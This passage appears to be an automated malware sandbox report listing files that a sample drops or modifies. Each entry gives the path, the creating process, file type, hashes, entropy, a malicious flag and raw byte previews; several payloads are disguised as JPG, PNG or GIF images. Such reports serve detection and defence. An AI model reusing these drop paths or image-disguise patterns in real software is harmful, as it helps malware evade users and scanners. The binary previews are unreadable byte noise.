                                                                                                              Preview:PK........R.<XL~..............J.JPG.....4..`....).hV\.7...c?...A{......7..........h.ez..sO.E...u.o ..F..qf.[...F.|....*....`.9....#v..#`sb....s......^.!k....4....7..Ll.K...^T..=..H...5.:".}.I.....U....%p..sv^e..O..S.@V..w..s..$.o..+.0..5..{...%...TxG :a..G..U..W.i^.FX@...Ny2..C..h....1..W.........1>..r'(.....U..S..O7c.Y..c,..$8b%\....X\{.M..../\E.SJ}..x..sy..\8.....4pe%.8.....&..I]`..nW..%...C.....}.}?.*...1....\....:.....J....tG....U..DN...S....r..... .E..(..F..^..}Y...s$_%..X.`....3.5..w..x..R2..K...x.......)f\.B.J.n.1.h...l.F.....r.:k9.<u@..U/....=...)...).....e.u..]+yI$q.F.0..`.o..g...P...\..%..../...B..v.: .....5........q......HTw.!.b...h.4}..2....9Z...s03.?A3..@....CJ..J.%.{EZ....d...lrZq..Y.C.[.".~k.6.....x!.A.*. [ .9.c.!....qv.E..dh..&..*8...N(...2v_.X~...(L.~........kp...B.us...r.p.y._.h#..JX.W............H.)+...7.Q....9#wS.......&...%..........BE..[....\~\.?LK.\...X.....<V"...._..~.=O9.....O..g....;~...*.&...Z\)L...2.EN...*Q.W..

                                                                                                              C:\ProgramData\efk2JUeS\lBoqoqIC.exe

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\DfP1K3\DfP1K3.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                              Category:modified
                                                                                                              Size (bytes):486832
                                                                                                              Entropy (8bit):7.8618165097114545
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:12288:gNrhTLpMP+R+QDCfA832AtBYmz6af0F7Z1QVjSOsJ/K:gthTiP+ffCfB5Lf0F7Z1EDsVK
                                                                                                              MD5:AA990DC3875790615E8CB024A78E9F9C
                                                                                                              SHA1:F8F9E17C7643FB1868B12D69F2BEDA2270D2BC88
                                                                                                              SHA-256:05F43E4848094F76922C7FF36FE99D62C9411022D2646E56427FE6F5DF8FB6D8
                                                                                                              SHA-512:D9AA0AF0C8FDDDCA0F5626C7F9EB0DC54280C92D5FBB45ABC5575799E1824ADC3EDEF30E19F0AA34CFE8CD0AF7AE4DDB13E06EF7F1FBFD118DF44E312E6D2223
                                                                                                              Malicious:true
                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......a...%.s.%.s.%.s.s.`...s...}...s.q=C.?.s..>y.(.s.%.r.x.s.G.`.<.s..8y...s..8x...s.%.s...s...u.$.s.Rich%.s.........................PE..L......T............................._.......p....@.................................C,......................................`........p..`u...........P..............................................................................................UPX0....................................UPX1................................@....rsrc........p...z..................@..............................................................................................................................................................................................................................................................................................................................................................................3.91.UPX!....

                                                                                                              C:\ProgramData\efk2JUeS\lBoqoqIC.png

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\DfP1K3\DfP1K3.exe
                                                                                                              File Type:PNG image data, 4026 x 4026, 8-bit colormap, non-interlaced
                                                                                                              Category:dropped
                                                                                                              Size (bytes):357440
                                                                                                              Entropy (8bit):7.999367116121707
                                                                                                              Encrypted:true
                                                                                                              SSDEEP:6144:mlMS00uPU0ovLFZL/hwQBXx/xO0JJu53+vn80QOzT:m6S00uPexZL/hZZx/xJoutQu
                                                                                                              MD5:45D868E26A3F4C44D799A1667DC12337
                                                                                                              SHA1:8D8ADE3168CA5094F3DFFA4CF31C7252421001F8
                                                                                                              SHA-256:8DE5B9B45C25D726AEC9CEACF1AE9BEBFB362F1883D8B05BF45B2ABA5615FC72
                                                                                                              SHA-512:49A8C8BACA897240AB7DBAE28A364D7F8F6E1B82423FF18B17CAED3DAC3829505E1ACF81A5F61B55434D2C72FDCB11A517278D33C506090FDFCBB48323F62367
                                                                                                              Malicious:true
                                                                                                              Preview:.PNG........IHDR.............K`#.....PLTEGpL..qbwo.r}dfkbefUo...V..N.pX<.#3j..F.Q..7......_.E.H.9....`=.yR.].Y.".9w......AJv.....h0DGO.?....+.Fp.4.[.'...0....61.$..d.].Q(.Mu.=8~.7\.d`..Y...Z.r.W..-.7.EY.?(..^...j..$.#.TX..\..Lo.:........k...J.!.....8.}....,.t.p....`........u..]^J.:......xY..w&>.:.....'..y6..Q....d...].%rk....n,.......W5.v...`T..C]..q.*z]a883...}%u5~0....&..o+X.:....d..*..!8t.2...Iv..{J+.!6..9w.B.}..C..c.........L.....0V.@..Q8.s.$.j..........."9...IlCL.F.<S>.i.q....:......J.v.....)....<.n.."...O...E.............x..+.DX.ix.EP.,|...Z.`.[.9h..>.<.......6.... ........<6.5&.]`.}....D..{7.....<4Qw.j%...2s....oo..AY......WP.$ ..3...mH.%..x...........].K..:D...J..^'.=.......jD..sL....... ...R#.......c...]{...i..>.W..US..Fw.....a1...M.z.....C$"q.kv...Kr.i6b........T.C..f{`..P..Q...(e..|.v...C...V..5..o..'.*..%..H6..!@y......iF...gO|....X........%D7;..'.-.~G......h&.|.9,/)..V`dk...z..~.w5....c_m..r..r...c.H..M.o.BG.jq&V....{.o...QK.

                                                                                                              C:\Users\Public\Music\destopbak.ini

                                                                                                              Download File
                                                                                                              Process:C:\Users\user\Documents\l0tiFM.exe
                                                                                                              File Type:MIPSEB MIPS-III ECOFF executable
                                                                                                              Category:dropped
                                                                                                              Size (bytes):2
                                                                                                              Entropy (8bit):1.0
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:s:s
                                                                                                              MD5:7E74F75663E5B5A4F3452A4C603EE45D
                                                                                                              SHA1:D5114B086B721F2C87EA7152025792958AB4C629
                                                                                                              SHA-256:DD1E2826C0124A6D4F7397A5A71F633928926C0608B62FB9E615BA778ACC39FF
                                                                                                              SHA-512:2F5D0D45593487BEBC2CCF968EAF2A4A3BDE1D5A29C7C2B5AD411E041C0D3B7A46BE439ED7083093057A96030683B9DEFBED1A2EF7882B3E64CF3FBC7C9CF12F
                                                                                                              Malicious:false
                                                                                                              Antivirus:
                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                              Preview:.@

                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\FOM-51[1].jpg

                                                                                                              Download File
                                                                                                              Process:C:\Users\user\Documents\l0tiFM.exe
                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
                                                                                                              Category:dropped
                                                                                                              Size (bytes):4859125
                                                                                                              Entropy (8bit):7.999956261017207
                                                                                                              Encrypted:true
                                                                                                              SSDEEP:98304:iwS8fBFQmSDP3eB/FsE7wRnIdq//xvpY/gMQ+nQxcweXxpuQ6SutPQNCG0o:iwSgTQfFAwdCqRvpk5QvxcwgXMSutTo
                                                                                                              MD5:EE6CA3EEA7F9B1C81059AEF570A28C02
                                                                                                              SHA1:14EFBF498356644D9B1327407E3F03E1BFBEA363
                                                                                                              SHA-256:A2065EA035C4E391C0FD897A932DCFF34D2CCD34579844C732F3577BC443B196
                                                                                                              SHA-512:563E7D7AB4A94505F1EFA5931F685A45D89CCB27A97593BF69C668AAA747C9511C8BE2AADA2E4DF3E9AB02559B564C699A8A9501B70420FAC3556758E29478D5
                                                                                                              Malicious:true
                                                                                                              Preview:......JFIF.............ZExif..MM.*.................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEF..................ijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......".*.;...i6QE................HJJKLINOP..ST.VWXYZ[\.^_`abcdefghijklmnopqrstuvwxyz{|}~........=..>.A

                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\s[1].jpg

                                                                                                              Download File
                                                                                                              Process:C:\Users\user\Desktop\2976587-987347589.07.exe
                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
                                                                                                              Category:dropped
                                                                                                              Size (bytes):8299
                                                                                                              Entropy (8bit):7.9354275320361545
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:192:plfK6KTBKkGUy8DJdg0ANCT/0E/jiG4hMrnv2:pBK6KTBZGWvg0ANCT/WGFv2
                                                                                                              MD5:9BDB6A4AF681470B85A3D46AF5A4F2A7
                                                                                                              SHA1:D26F6151AC12EDC6FC157CBEE69DFD378FE8BF8A
                                                                                                              SHA-256:5207B0111DC5CC23DA549559A8968EE36E39B5D8776E6F5B1E6BDC367937E7DF
                                                                                                              SHA-512:5930985458806AF51D54196F10C3A72776EFDDA5D914F60A9B7F2DD04156288D1B8C4EB63C6EFD4A9F573E48B7B9EFE98DE815629DDD64FED8D9221A6FB8AAF4
                                                                                                              Malicious:false
                                                                                                              Preview:......JFIF.............ZExif..MM.*.................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEF..................ijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......".*.;...i6QE...............CHI........[..>G..*C..&.!7*..E..)U&.$...z.tuv......?..............

                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\FOM-52[1].jpg

                                                                                                              Download File
                                                                                                              Process:C:\Users\user\Documents\l0tiFM.exe
                                                                                                              File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                                                                                              Category:dropped
                                                                                                              Size (bytes):5062442
                                                                                                              Entropy (8bit):7.999518892518095
                                                                                                              Encrypted:true
                                                                                                              SSDEEP:98304:GIusCrIENkeXPV97kqmCf4P48E37aREUXr7VYyUOhez2IlpmURniNmJ:Xngv7NmCAPLTREQVb8/RomJ
                                                                                                              MD5:70C21DA900796B279A09040B00953E40
                                                                                                              SHA1:7CD3690B1FDDE033CD47E657FC4FC3A423DF716F
                                                                                                              SHA-256:901330243EF0F7F0AAE4F610693DA751873E5B632E5F39B98E3DB64859D78CBC
                                                                                                              SHA-512:851F4ED843F5D47C93D6C5A7D1895A674B6448631B567A0CCB2DF5873E4A5E722F28ECFC4D0D3220A86309481F9793FCDDA4F89BD993FB79CD09DBED29423752
                                                                                                              Malicious:true
                                                                                                              Preview:.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........|..z....|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....

                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\c[1].gif

                                                                                                              Download File
                                                                                                              Process:C:\Users\user\Desktop\2976587-987347589.07.exe
                                                                                                              File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                                                                                              Category:dropped
                                                                                                              Size (bytes):10681
                                                                                                              Entropy (8bit):7.866148090449211
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:192:fN3El4oBtN9pmD65VoeotpeGy/nmgVtKFbM/PvMZ5ZWtZl4EehHGXI9Fch5:fN3E7NW27oJWJ+M/8ZCDuEe2I9FS5
                                                                                                              MD5:10A818386411EE834D99AE6B7B68BE71
                                                                                                              SHA1:27644B42B02F00E772DCCB8D3E5C6976C4A02386
                                                                                                              SHA-256:7545AC54F4BDFE8A9A271D30A233F8717CA692A6797CA775DE1B7D3EAAB1E066
                                                                                                              SHA-512:BDC5F1C9A78CA677D8B7AFA2C2F0DE95337C5850F794B66D42CAE6641EF1F8D24D0F0E98D295F35E71EBE60760AD17DA1F682472D7E4F61613441119484EFB8F
                                                                                                              Malicious:false
                                                                                                              Preview:.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........|..z....|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....

                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\drops[1].jpg

                                                                                                              Download File
                                                                                                              Process:C:\Users\user\Documents\l0tiFM.exe
                                                                                                              File Type:PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                                                              Category:dropped
                                                                                                              Size (bytes):37274
                                                                                                              Entropy (8bit):7.991781062764932
                                                                                                              Encrypted:true
                                                                                                              SSDEEP:768:6uBASoT9gu8yCOpS/DCNuoaa7SOjrX+ACdA7EtGKDRklnvga371DNpnN7s:fGSfyxENa7ZCRtxylnvgAVNI
                                                                                                              MD5:6D4DEB9526F3973DE0F9DCE9392F8EA7
                                                                                                              SHA1:520128FB9BAB7064BEA992E4427B924073E58C0E
                                                                                                              SHA-256:B415D73DC6CBEEE59736ADD1AF397B6982BDB2B3A9E994797EE6AF5979E58FD1
                                                                                                              SHA-512:F07E0DAEEE5C54BC8DB462630F46A339D9ED0AF346BAB113B4EC7FD2BC463AFC04CBD0FDFC8D9F54528B7127AA7735575A255B85F2D0B3CCD518FC5DC39BA447
                                                                                                              Malicious:true
                                                                                                              Preview:.PNG........IHDR.............\r.f....pHYs............... .IDATx....n.....&E!J.%M.."..9....."...H..L.....LI:.)..K7..!.4Q...{..d.....[......Z{......<.y<9.o...w....]...q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q......3%.F.1p..rD%.;%rD.1p.....qz.....1n.....p.....qz.....1n...0.^.I..9......c.Z....$.Q..K=.OKp=...e%.(.R.....p-tzD..9.m...+.Un...S...5..F..D......R.ys.?W.....|]....Ke......G......U..1....#^..1|..!.O.OWr.H.w.P..p.V..H.wz..mo.U....?F......k7[2.."....+...&]#..d......<...V\{P..d...8=.9..Al....Wr......Pc`......X.g..\.|i7.....O.B.g.p...]..%.^..T.w....a.u..x..zZ........V.....$.Y.6.t....?*.g.~..@.93.g.....lPn..o...7.p.J.Cq....J....3.<]...X...w..o..\.u...Jv...3e.).9q..6(..s...^.k...#..[Vr.t.47J}..M......:.....I%.Q\cPN.n...R.z;3J..c....q.].~s.J..._.d.........y....ur{:v...A.I%....)..*..t{..(.g.o...;....>..7)~{P~_.....5t{X<.x....J....J.0..YY\b.-&.?...Y7.$.X_.e.......{..Jd.3w...l......q.M...&..*...~f...[./.......w..U.^.{q.`......GVV...5.;Z.`W.-uxV...

                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\i[1].dat

                                                                                                              Download File
                                                                                                              Process:C:\Users\user\Desktop\2976587-987347589.07.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):512
                                                                                                              Entropy (8bit):5.186642107139491
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:6:WcSRpdRdbCrCa2BIDR+syYWRudduXCCA7OdUzW9E40/qcX:URpiMBIDRNyYWRudduXCCigUzWg3
                                                                                                              MD5:A1CC6E3DD3069453BEF8913F9698C666
                                                                                                              SHA1:2A3E6F584700A78F1C1691238F9673CBCA8084FD
                                                                                                              SHA-256:4BF6D36A529FD1214D07E344298AF465AA7D764CA2BDBBA4B3D7C070B3CE25F9
                                                                                                              SHA-512:76A43622E6FDF6DE22F3EAC452F378C809FC28B84CA76774818BD8ACD9C2AC352085BE0F721B661978B0B98A4B87AEBC8C4ED6815C48FC271992094EE75BE57D
                                                                                                              Malicious:false
                                                                                                              Preview:....l%00...X>?v7DD.T:y61X[X_8q>3ZJF]>.s>QS._q86999999999999999999999999999999999QMMI:sffPPT.hi a..L.l/`g....n'he....hx%h..G.$mclllllllllllllllllllllllllllllllll....o&33...[=<u4GG.W9z52[X[\;r=0YIE^=-p=RP.^p97888888888888888888888888888888888PLLH;rggQQU.ih!`..M.m.af....o&id....iy$i..F.#jdkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk....~ss1TIT1111111111111111111111111111111111111GBT]2:s9UU99999999999999999999999999999999999999nVK]-<9.rwo~.P..................................QoQl ...6|ylllllllllllllllllllllllllllllllllllll

                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\FOM-53[1].jpg

                                                                                                              Download File
                                                                                                              Process:C:\Users\user\Documents\l0tiFM.exe
                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
                                                                                                              Category:dropped
                                                                                                              Size (bytes):366410
                                                                                                              Entropy (8bit):7.375315637594966
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:6144:XC/wwzn9iJzBFsJmUSmfXVz7pB+iMuVrt5DY:9ws7FsJmUSmd7pBpMgR58
                                                                                                              MD5:DA1D5EB665D3AAD523BE59415E6449ED
                                                                                                              SHA1:40C310E82035381410B83E4F1DA0A4410FEB8FE6
                                                                                                              SHA-256:F919634AC7E0877663FFF06EA9E430B530073D6E79EEE543D02331F4DFF64375
                                                                                                              SHA-512:6F179A166126C97444920636B584FB0BA4E9596A659921A2BCAA80E7DE094A87402D3E2B6D8DA8797045D7E22C3D37E6CED2A8E137E0387A1320D631B139FD36
                                                                                                              Malicious:false
                                                                                                              Preview:......JFIF.............ZExif..MM.*.................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEF..................ijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......".*.;...i6QE.................IZ....OQPSS.U.WX..[..&6.ab.)eLghibkinoouqrsuuvw2zy{}}~.............

                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\a[1].gif

                                                                                                              Download File
                                                                                                              Process:C:\Users\user\Desktop\2976587-987347589.07.exe
                                                                                                              File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                                                                                              Category:dropped
                                                                                                              Size (bytes):135589
                                                                                                              Entropy (8bit):7.995304392539578
                                                                                                              Encrypted:true
                                                                                                              SSDEEP:3072:CQFCJFvegK8iS+UKaskx87eJd0Cn/zUR7Tq:CKwvehSbsY8anIde
                                                                                                              MD5:0DDD3F02B74B01D739C45956D8FD12B7
                                                                                                              SHA1:561836F6228E24180238DF9456707A2443C5795C
                                                                                                              SHA-256:2D3C7FBB4FBA459808F20FDC293CDC09951110302111526BC467F84A6F82F8F6
                                                                                                              SHA-512:0D6A7700FA1B8600CAE7163EFFCD35F97B73018ECB9A17821A690C179155199689D899F8DCAD9774F486C9F28F4D127BFCA47E6D88CC72FB2CDA32F7F3D90238
                                                                                                              Malicious:true
                                                                                                              Preview:.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........|..z....|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....

                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\d[1].gif

                                                                                                              Download File
                                                                                                              Process:C:\Users\user\Desktop\2976587-987347589.07.exe
                                                                                                              File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                                                                                              Category:dropped
                                                                                                              Size (bytes):3892010
                                                                                                              Entropy (8bit):7.995495589600101
                                                                                                              Encrypted:true
                                                                                                              SSDEEP:98304:NAHrPzE9m4wgyNskyumYyryfxFVLqndnA1Nfjh:j5wgHh/nyZLN1
                                                                                                              MD5:E4E46F3980A9D799B1BD7FC408F488A3
                                                                                                              SHA1:977461A1885C7216E787E5B1E0C752DC2067733A
                                                                                                              SHA-256:6166EF3871E1952B05BCE5A08A1DB685E27BD83AF83B0F92AF20139DC81A4850
                                                                                                              SHA-512:9BF3B43D27685D59F6D5690C6CDEB5E1343F40B3739DDCACD265E1B4A5EFB2431102289E30734411DF4203121238867FDE178DA3760DA537BAF0DA07CC86FCB4
                                                                                                              Malicious:true
                                                                                                              Preview:.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........|..z....|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....

                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\f[1].dat

                                                                                                              Download File
                                                                                                              Process:C:\Users\user\Documents\l0tiFM.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):879
                                                                                                              Entropy (8bit):4.5851931774575325
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:6:JRSscjAQ7F3Y+ZcRC60rdimzYFAQT7LE/o2xjC:fSscjHRY+ZcRAdimzo/OY
                                                                                                              MD5:E54C4296F011EC91D935AA353C936E34
                                                                                                              SHA1:53A3313D40696E87C9B8CE2BE7E67BE49DD34C20
                                                                                                              SHA-256:81FF16AEDF9C5225CE8A03C0608CC3EA417795D98345699F2C240A0D67C6C33D
                                                                                                              SHA-512:5D1FBA60BE82A33341E5B9E7D3C1E7B0DCC9A41B4C1F97F2930141A808D62AF56D8697CB0D2FD4894A6080DF98A3E4EEF9D98A6003C292C588F547E1C6F84DE1
                                                                                                              Malicious:false
                                                                                                              Preview:.V.Wf4e111111111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW11111111111111111111.BTE5k1=I=======.NXI9g%&A&&&&&&&NRRV%lyyKK..:{ggJ..J"+$-WEBXv941HD_R!|1=P.{r?_GBl(2%%%%%%%%%%%%%%%%%%%%%%%%%%%%%MQQU&ozzHH..9xddI..I!('.TFA[u:72KG\Q".2>S.xq<\D@n*0'''''''''''''''''''''''''''''OSSW$mxxJJ..;zffK..K#*%,VDCYw850IE^S }0<Q.zs>^FAo+1&&&&&&&&&&&&&&&&&&&&&&&&&&&&&NRRV%lyyKK..:{ggJ..J"+$-WEBXv941HD_R!|1=P.{r?_GAo+1&&&&&&&&&&&&&&&&&&&&&&&&&&&&&....&&&&....&&&&....&&&9\A\999999999999999999999M[ZV$3e.-goooooooooooooooooooooooooooooooooooooo...A23"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA45(-^.[N6><!K!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\FOM-50[1].jpg

                                                                                                              Download File
                                                                                                              Process:C:\Users\user\Documents\l0tiFM.exe
                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
                                                                                                              Category:dropped
                                                                                                              Size (bytes):55085
                                                                                                              Entropy (8bit):7.99273647746538
                                                                                                              Encrypted:true
                                                                                                              SSDEEP:1536:puwkqL5y4p4KnRWlENc3PGdLLv/PJctIJPc+pifyC:kQM4+B/MLL/PmaG
                                                                                                              MD5:DC44AE348E6A74B3A74871020FDFAC74
                                                                                                              SHA1:B223020A5F82FF15FD5E4930477F38F34C9CB919
                                                                                                              SHA-256:48F258037BE0FFE663DA3BCD47DBA22094CC31940083D9E18A71882BDC1ECDB8
                                                                                                              SHA-512:5FB13A8CE2206119C76325504DEF61D4277A73D71D79157AE564F326D6FC18080218633CE7C708F31A81D6CD1A5AD8A903CFE1CC0C57183B4809A9C12E32A429
                                                                                                              Malicious:true
                                                                                                              Preview:......JFIF.............ZExif..MM.*.................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEF..................ijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......".*.;...i6QE................HJJKLINOP..ST.VWXYZ[\.^_`abcdefghijklmnopqrstuvwxyz{|}~..a.....=..>.A

                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\b[1].gif

                                                                                                              Download File
                                                                                                              Process:C:\Users\user\Desktop\2976587-987347589.07.exe
                                                                                                              File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                                                                                              Category:dropped
                                                                                                              Size (bytes):125333
                                                                                                              Entropy (8bit):7.993522712936246
                                                                                                              Encrypted:true
